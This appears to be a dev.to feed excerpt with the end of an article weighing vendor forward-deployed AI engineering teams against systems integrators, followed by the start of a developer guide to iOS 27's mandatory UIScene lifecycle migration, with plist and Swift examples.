&lt;p&gt;When Microsoft Frontier engineers deploy AI in your business, they are excellent at deploying Microsoft's AI. When AWS FDEs arrive, the answer will be AWS-native and, in AWS's own framing, agentic-first. This is not a criticism of the engineers, who are likely to be very good. It is a description of the incentive. You are hiring your model vendor's implementation arm to evaluate whether your problem needs that vendor's model.&lt;/p&gt;

&lt;p&gt;Some of these ventures have deliberately structured against this. AWS says deployments are built around shared goals and business outcomes rather than billable hours, and that customers should be self-sufficient when a deployment ends. That is a meaningful commitment and worth holding them to in writing. OpenAI's Deployment Company is majority-owned and controlled by OpenAI. Anthropic's venture brought in Blackstone, Hellman &amp;amp; Friedman and Goldman Sachs as outside partners, which dilutes but does not remove the alignment question.&lt;/p&gt;

&lt;p&gt;The traditional systems integrator has the opposite profile. Accenture is model-neutral in a way Microsoft Frontier structurally cannot be, and it has 80,000 AI and data professionals plus the data-transformation capability that half of these projects turn out to need. The trade is that scale bundles. Sweet's own framing is that advanced AI is now "embedded in some way across nearly everything we do", which is why the company stopped breaking out the metric at all.&lt;/p&gt;

&lt;p&gt;That disclosure change matters to you as a buyer, and it is worth being precise about it. Accenture was the first in its industry to report advanced AI bookings and revenue separately. Sweet announced that Q1 FY2026 would be the last quarter with those specific metrics:&lt;/p&gt;

&lt;p&gt;"This will be the last quarter in which we share these specific metrics. The demand for AI is both real and rapidly maturing. We've now reached a point where advanced AI is being embedded in some way across nearly everything we do, and many of our clients are focusing on moving beyond standalone proof of concepts or initiatives."&lt;/p&gt;

&lt;p&gt;The reasoning is defensible. The consequence is that the one public series that let outsiders track whether AI consulting was converting bookings into revenue has been switched off. In late 2023 the figure was $100 million across 100 projects. Two years later it was $11.5 billion across 11,000 projects with $4.8 billion of revenue. That is a real business. It is also now unobservable, which means your own pilot results are the only evidence you will get.&lt;/p&gt;

&lt;h2&gt;
  
  
  A decision framework that survives the pitch
&lt;/h2&gt;

&lt;p&gt;Match the model to your actual constraint, not to the logo.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Your situation&lt;/th&gt;
&lt;th&gt;The model that usually fits&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Committed to one model vendor's stack, need speed, have clean data&lt;/td&gt;
&lt;td&gt;Vendor FDE team (Microsoft Frontier, AWS, OpenAI, Anthropic)&lt;/td&gt;
&lt;td&gt;Deepest product knowledge, direct escalation into the vendor's engineering, fastest path when the answer genuinely is that stack&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-year transformation, messy data across many systems, regulated industry&lt;/td&gt;
&lt;td&gt;Large systems integrator&lt;/td&gt;
&lt;td&gt;Data and process work at scale, model neutrality, the capacity to run a five-year programme&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;One high-value workflow, deep domain rules, you intend to own it&lt;/td&gt;
&lt;td&gt;Boutique or regional partner&lt;/td&gt;
&lt;td&gt;Domain depth, senior attention on a small programme, and the knowledge transfers to your team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;You do not yet know if AI is the right tool&lt;/td&gt;
&lt;td&gt;None of them yet&lt;/td&gt;
&lt;td&gt;Every option above is paid to conclude that it is. Do the diagnostic separately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pilot worked, scaling stalled&lt;/td&gt;
&lt;td&gt;Depends on why it stalled&lt;/td&gt;
&lt;td&gt;If it stalled on data, you have a data problem. If it stalled on process, no engineer fixes that&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The fourth row is the one people skip, and it is the cheapest advice in this article. Every organisation on that list, including ours, makes money when the answer is "yes, build it". If you have not separated the diagnostic from the delivery, you have outsourced the most consequential decision to the party with the least reason to say no.&lt;/p&gt;

&lt;h3&gt;
  
  
  The five questions to ask every one of them
&lt;/h3&gt;

&lt;p&gt;Ask these in the room, and write the answers into the contract:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;What happens when the right answer is a competitor's model, or no model at all? Ask for a specific example from the last year.&lt;/li&gt;
&lt;li&gt;Who owns the code, the prompts, the evaluation suites and the fine-tuned artefacts when this ends?&lt;/li&gt;
&lt;li&gt;What does self-sufficiency mean concretely? AWS says customers should be self-sufficient when a deployment ends. Ask each vendor to define the exit state and put a date on it.&lt;/li&gt;
&lt;li&gt;Is the data work in scope or out of scope? Half of these programmes need it. If the proposal does not mention data, the proposal is incomplete or the cost is coming later.&lt;/li&gt;
&lt;li&gt;Who exactly is on my team, and what happens to them in month seven? Six thousand experts is an organisation. Five people are your project.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The second question is where most of the value leaks. An implementation partner that keeps the evaluation harness keeps the ability to prove the system works, which is the same as keeping you.&lt;/p&gt;

&lt;h2&gt;
  
  
  What this means for India
&lt;/h2&gt;

&lt;p&gt;Two implications for Indian enterprises and for teams building from India.&lt;/p&gt;

&lt;p&gt;The economics of forward-deployed engineering do not survive contact with mid-market budgets. Microsoft's 6,000 experts and Accenture's 80,000 AI and data professionals are aimed at programmes that justify their cost, and the named early customers, Unilever, Novo Nordisk, Southwest Airlines and the NBA, tell you the target size. If your AI budget is ₹50 lakh rather than $50 million, none of the five ventures above is really selling to you, whatever the press release says. The realistic options are a domestic partner or your own team, and the useful part of this news is the model rather than the vendor: small senior teams, embedded, working on one workflow, measured on outcomes.&lt;/p&gt;

&lt;p&gt;The second is governance. Embedding a vendor's engineers inside your operations means giving outside staff access to production systems and personal data. Under the &lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt;, the obligation for that data stays with you as the data fiduciary, not with the firm whose badge the engineer wears. Settle access scope, data residency and processing terms before anyone is embedded, not in month three. We design applications aligned with DPDP requirements, and this is the clause that gets negotiated last and matters first.&lt;/p&gt;

&lt;p&gt;For the wider picture on where this spending sits, our &lt;a href="https://ecorpit.com/generative-ai-enterprise-strategy-2026/" rel="noopener noreferrer"&gt;enterprise generative AI strategy guide&lt;/a&gt; covers the build-versus-buy decision, and the &lt;a href="https://ecorpit.com/openai-price-cuts-anthropic-war-2026/" rel="noopener noreferrer"&gt;OpenAI and Anthropic pricing analysis&lt;/a&gt; covers the model-cost side that these deployment deals sit on top of.&lt;/p&gt;

&lt;h2&gt;
  
  
  The honest read
&lt;/h2&gt;

&lt;p&gt;The vendors have correctly identified that implementation, not model quality, is what separates a pilot from production. TechCrunch reported on July 15, 2026 that Anthropic and Blackstone are betting implementation is the next trillion-dollar AI business. They may well be right about the market.&lt;/p&gt;

&lt;p&gt;That does not make any of them the right choice for you. The strongest argument in this entire news cycle is not Microsoft's $2.5 billion or OpenAI's $4 billion. It is Julie Sweet's throwaway line that at least half of advanced AI projects also require a data project, because it tells you that most of what you are about to buy is not AI work at all. Buy the diagnosis from someone who is not selling the cure.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What is Microsoft Frontier Company?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Microsoft Frontier Company is an operating business Microsoft announced on July 2, 2026, backed by $2.5 billion and 6,000 industry and engineering experts. It embeds engineers inside customers to design, build, deploy and run AI systems using Microsoft's AI tools. It is led by Rodrigo Kede Lima, and initial clients include Unilever and Novo Nordisk.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is a forward-deployed engineer?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A forward-deployed engineer is a technical employee a vendor sends to work inside a customer's operations, designing, building, deploying and running systems on-site rather than delivering from a distance. AWS staffs teams of roughly five or six engineers per customer. The model predates this AI cycle, but the model vendors have now industrialised it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much have AI vendors committed to deployment services in 2026?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Between May 4 and July 2, 2026, five commitments landed. Anthropic's joint venture is valued at $1.5 billion with a $300 million founding commitment, OpenAI's Deployment Company raised over $4 billion, AWS committed $1 billion, and Microsoft Frontier Company committed $2.5 billion with 6,000 experts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should we hire our model vendor's engineers to deploy our AI?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It depends on your constraint. Vendor teams offer the deepest product knowledge and direct escalation, which suits a committed stack, clean data and a need for speed. The structural issue is that they are paid to conclude their model is the answer. Separate the diagnostic from the delivery before you decide.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why did Accenture stop reporting its AI numbers?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CEO Julie Sweet said Q1 FY2026 would be the last quarter for those specific metrics, because advanced AI is now "embedded in some way across nearly everything we do". Cumulative advanced AI bookings had reached $11.5 billion across 11,000 projects with $4.8 billion in revenue, up from $100 million across 100 projects in late 2023.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is data the real bottleneck in enterprise AI?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;According to Accenture, largely yes. Julie Sweet said at least half of the company's advanced AI projects also require a data project, and described clients as carrying "process debt" and "data debt". If a deployment proposal does not put data work in scope, either the proposal is incomplete or that cost arrives later.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does this change anything for mid-market or Indian companies?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not directly. The named early customers, including Unilever, Novo Nordisk, Southwest Airlines and the NBA, indicate the programme size these ventures target. What travels down-market is the operating model rather than the vendor: small senior teams, embedded, focused on one workflow, and measured on business outcomes instead of billable hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What should we put in the contract with a deployment partner?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Four things. Ownership of code, prompts, evaluation suites and fine-tuned artefacts at exit. A defined self-sufficiency state with a date. Whether data work is in or out of scope. Named individuals on your team and what happens to them mid-programme. The evaluation harness is the item most often retained by the vendor.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT is a boutique partner, and this article is deliberate about what that means: we are a good fit for one high-value workflow with real domain rules, where you want senior engineers embedded and the knowledge left behind with your team, and a poor fit for a five-year, multi-country transformation. Our senior engineering teams have built and run production systems since 2021, and we will tell you when the answer is a data project rather than an AI project. If you want that diagnostic before you sign with anyone, including us, &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;talk to our team&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/07/02/microsoft-launches-its-own-ai-deployment-company-with-2-5-billion-commitment/" rel="noopener noreferrer"&gt;Microsoft launches its own AI deployment company with $2.5 billion commitment&lt;/a&gt; - TechCrunch&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cnbc.com/2026/07/02/microsoft-commits-2point5-billion-6000-employees-ai-implementation-unit.html" rel="noopener noreferrer"&gt;Microsoft commits $2.5 billion and 6,000 employees to new AI implementation unit&lt;/a&gt; - CNBC&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.geekwire.com/2026/microsoft-announces-2-5b-frontier-company-to-embed-ai-engineers-inside-customers/" rel="noopener noreferrer"&gt;Microsoft unveils $2.5B Frontier Company to embed AI engineers inside customers&lt;/a&gt; - GeekWire&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.aboutamazon.com/news/aws/aws-1-billion-forward-deployed-ai-engineers" rel="noopener noreferrer"&gt;AWS invests $1 billion to embed AI forward deployed engineers with customers&lt;/a&gt; - About Amazon&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cnbc.com/2026/06/30/aws-amazon-ai-forward-deployed-engineers.html" rel="noopener noreferrer"&gt;AWS puts $1 billion into new AI unit to embed engineers with customers&lt;/a&gt; - CNBC&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/06/30/amazon-launches-new-1-billion-fde-org-following-openai-and-anthropic/" rel="noopener noreferrer"&gt;Amazon launches new $1 billion FDE org, following OpenAI and Anthropic&lt;/a&gt; - TechCrunch&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/05/04/anthropic-and-openai-are-both-launching-joint-ventures-for-enterprise-ai-services/" rel="noopener noreferrer"&gt;Anthropic and OpenAI are both launching joint ventures for enterprise AI services&lt;/a&gt; - TechCrunch&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techcrunch.com/2026/07/15/anthropic-blackstone-bet-the-next-trillion-dollar-ai-business-is-implementation-not-models/" rel="noopener noreferrer"&gt;Anthropic, Blackstone bet the next trillion-dollar AI business is implementation, not just models&lt;/a&gt; - TechCrunch&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.constellationr.com/blog/news/accenture-says-advanced-ai-so-pervasive-it-wont-break-it-out-anymore" rel="noopener noreferrer"&gt;Accenture says advanced AI is so pervasive it won't break it out anymore&lt;/a&gt; - Larry Dignan, Constellation Research&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://investor.accenture.com/~/media/Files/A/accenture-v4/investors/earnings-reports/2026/accentures-first-quarter-fiscal-2026-earnings-press-release.pdf" rel="noopener noreferrer"&gt;Accenture's first quarter fiscal 2026 earnings press release&lt;/a&gt; - Accenture Investor Relations&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techwireasia.com/2026/07/microsoft-frontier-company-enterprise-ai-deployments/" rel="noopener noreferrer"&gt;Microsoft launches $2.5B Frontier Company for enterprise AI&lt;/a&gt; - Tech Wire Asia&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.pymnts.com/news/artificial-intelligence/2026/ai-giants-spend-8-billion-dollars-fix-enterprise-adoption/" rel="noopener noreferrer"&gt;AI giants pour billions into enterprise deployment&lt;/a&gt; - PYMNTS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.marktechpost.com/2026/05/20/what-is-a-forward-deployed-engineer-the-ai-role-openai-anthropic-and-google-are-hiring-in-2026/" rel="noopener noreferrer"&gt;What is a forward deployed engineer: the AI role OpenAI, Anthropic and Google are hiring in 2026&lt;/a&gt; - MarkTechPost&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techtarget.com/searchenterpriseai/feature/The-rise-of-the-AI-forward-deployed-engineer" rel="noopener noreferrer"&gt;The rise of the AI forward-deployed engineer&lt;/a&gt; - TechTarget&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.meity.gov.in/content/digital-personal-data-protection-act-2023" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023&lt;/a&gt; - Ministry of Electronics and Information Technology, Government of India&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.indiacode.nic.in/handle/123456789/22037?locale=en" rel="noopener noreferrer"&gt;Digital Personal Data Protection Act, 2023 (No. 22 of 2023), official text&lt;/a&gt; - India Code&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: July 16, 2026.&lt;/p&gt;

</description>
      <category>enterpriseai</category>
    </item>
    <item>
      <title>iOS 27 stops apps that skip UIScene: the API changes to fix before September</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 19:06:39 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/ios-27-stops-apps-that-skip-uiscene-the-api-changes-to-fix-before-september-36ck</link>
      <guid>https://dev.to/mr_manushukla/ios-27-stops-apps-that-skip-uiscene-the-api-changes-to-fix-before-september-36ck</guid>
      <description>&lt;h1&gt;
  
  
  iOS 27 stops apps that skip UIScene: the API changes to fix before September
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; The iOS 27 public beta reached testers on July 13, 2026, and the general release is expected in September 2026. One change in this cycle is different from the rest, because it is no longer a warning. Apple's UIKit documentation states it plainly: "Beginning in iOS 27, iPadOS 27, Mac Catalyst 27, tvOS 27, and visionOS 27, apps built with the latest SDK must adopt the scene-based life cycle or they fail to launch." That has been a console message since iOS 18.4 and a louder one in iOS 26. In iOS 27 it is an assert. Alongside it, On Demand Resources and &lt;code&gt;NSBundleResourceRequest&lt;/code&gt; are deprecated in favour of Background Assets, the original MetricKit APIs are no longer recommended for new adoption, and Xcode 27 ships Swift 6.4 while requiring macOS Tahoe 26.4 or later. Budget one to three engineer-days for the UIScene work on a typical UIKit app, roughly $400 to $1,200 (about ₹35,000 to ₹1,05,000) of senior time. The trap is that this is triggered by the SDK you build with, not the OS your users run.&lt;/p&gt;

&lt;p&gt;That last point decides your timeline. Your shipping binary is fine. The next build you cut with Xcode 27 is the one that will not start.&lt;/p&gt;

&lt;p&gt;This guide is about the code, not the devices. If you are planning the device and fleet side of the rollout, our &lt;a href="https://ecorpit.com/ios-27-enterprise-rollout-beta-to-september-launch-plan/" rel="noopener noreferrer"&gt;iOS 27 enterprise rollout plan&lt;/a&gt; and the &lt;a href="https://ecorpit.com/ios-27-public-beta-july-fleet-readiness-checklist-2026/" rel="noopener noreferrer"&gt;public beta readiness checklist&lt;/a&gt; cover that ground. Here we are dealing with what breaks inside your app.&lt;/p&gt;

&lt;h2&gt;
  
  
  The UIScene mandate is the whole story
&lt;/h2&gt;

&lt;p&gt;Everything else in this release is scheduling. This one is a launch failure.&lt;/p&gt;

&lt;p&gt;Apple has been escalating this warning for two years. Starting in iOS 18.4, iPadOS 18.4, Mac Catalyst 18.4, tvOS 18.4 and visionOS 2.4, UIKit logged this for apps that had not migrated:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This process does not adopt UIScene lifecycle.
This will become an assert in a future version.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In iOS 26 the wording hardened:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;UIScene lifecycle will soon be required.
Failure to adopt will result in an assert in the future.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In iOS 27 the future arrived. Apps built against the new SDK that have not adopted scenes are stopped at launch. This is not theoretical, and it is not limited to hand-written UIKit apps. An unmodified Expo SDK 56 blank TypeScript app, prebuilt for iOS and compiled with Xcode 27.0 beta (build 27A5194q), &lt;a href="https://github.com/expo/expo/issues/46664" rel="noopener noreferrer"&gt;dies on launch with a runtime assert&lt;/a&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Application failed to launch: UIScene life cycle is required for apps built with this SDK.
See Technote TN3187 for more information on migration.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Expo issue was filed on June 8, 2026, accepted by the maintainers, and labelled as upstream React Native work. If your cross-platform toolchain generates the native iOS project for you, you are exposed to this through your framework rather than your own code, and the fix arrives on your framework's schedule. That is the part worth acting on this month.&lt;/p&gt;

&lt;h3&gt;
  
  
  Do you need to migrate?
&lt;/h3&gt;

&lt;p&gt;Apple's criteria are precise. Migrate if either of these is true:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;UIApplicationSceneManifest&lt;/code&gt; key is missing from your information property list, or it has no specified configurations.&lt;/li&gt;
&lt;li&gt;Your app delegate does not implement &lt;code&gt;application(_:configurationForConnecting:options:)&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One command answers the first question:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;plutil &lt;span class="nt"&gt;-extract&lt;/span&gt; UIApplicationSceneManifest raw &lt;span class="nt"&gt;-o&lt;/span&gt; - ios/YourApp/Info.plist
&lt;span class="c"&gt;# UIApplicationSceneManifest: missing   &amp;lt;- you need to migrate&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that prints "missing", your next Xcode 27 build will not launch. Run it today. It takes ten seconds and it is the single highest-value check in this article.&lt;/p&gt;

&lt;h3&gt;
  
  
  The fix
&lt;/h3&gt;

&lt;p&gt;Add a &lt;code&gt;UIApplicationSceneManifest&lt;/code&gt; key with a scene configuration to your information property list:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UIApplicationSceneManifest&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;dict&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UIApplicationSupportsMultipleScenes&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;false/&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UISceneConfigurations&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;dict&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UIWindowSceneSessionRoleApplication&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;array&amp;gt;&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;lt;dict&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UISceneConfigurationName&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;Default Configuration&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UISceneDelegateClassName&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;$(PRODUCT_MODULE_NAME).SceneDelegate&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;key&amp;gt;&lt;/span&gt;UISceneStoryboardFile&lt;span class="nt"&gt;&amp;lt;/key&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;Main&lt;span class="nt"&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;lt;/dict&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/array&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;/dict&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/dict&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you build your root view controller in code rather than from a storyboard, implement &lt;code&gt;scene(_:willConnectTo:options:)&lt;/code&gt; and move the window out of the app delegate:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight swift"&gt;&lt;code&gt;&lt;span class="kd"&gt;import&lt;/span&gt; &lt;span class="kt"&gt;UIKit&lt;/span&gt;

&lt;span class="kd"&gt;class&lt;/span&gt; &lt;span class="kt"&gt;SceneDelegate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kt"&gt;UIResponder&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;UIWindowSceneDelegate&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;var&lt;/span&gt; &lt;span class="nv"&gt;window&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kt"&gt;UIWindow&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;

  &lt;span class="kd"&gt;func&lt;/span&gt; &lt;span class="nf"&gt;scene&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;_&lt;/span&gt; &lt;span class="nv"&gt;scene&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kt"&gt;UIScene&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;willConnectTo&lt;/span&gt; &lt;span class="nv"&gt;session&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kt"&gt;UISceneSession&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;options&lt;/span&gt; &lt;span class="nv"&gt;connectionOptions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kt"&gt;UIScene&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="kt"&gt;ConnectionOptions&lt;/span&gt;
  &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;guard&lt;/span&gt; &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="nv"&gt;windowScene&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;scene&lt;/span&gt; &lt;span class="k"&gt;as?&lt;/span&gt; &lt;span class="kt"&gt;UIWindowScene&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;window&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kt"&gt;UIWindow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;windowScene&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;windowScene&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;window&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rootViewController&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kt"&gt;YourRootViewController&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;window&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;makeKeyAndVisible&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then move your life-cycle logic. Apple's mapping is one-to-one, and this table is the migration:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;UIApplicationDelegate method&lt;/th&gt;
&lt;th&gt;UISceneDelegate replacement&lt;/th&gt;
&lt;th&gt;What usually lives here&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;applicationDidBecomeActive(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sceneDidBecomeActive(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Analytics session start, resuming timers and video&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;applicationWillResignActive(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sceneWillResignActive(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pausing playback, hiding sensitive UI before the app switcher&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;applicationDidEnterBackground(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sceneDidEnterBackground(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Saving state, flushing caches, starting background tasks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;applicationWillEnterForeground(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sceneWillEnterForeground(_:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Refreshing stale data, re-checking auth tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;application(_:didFinishLaunchingWithOptions:)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Stays on the app delegate&lt;/td&gt;
&lt;td&gt;Process-level setup only, not window creation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

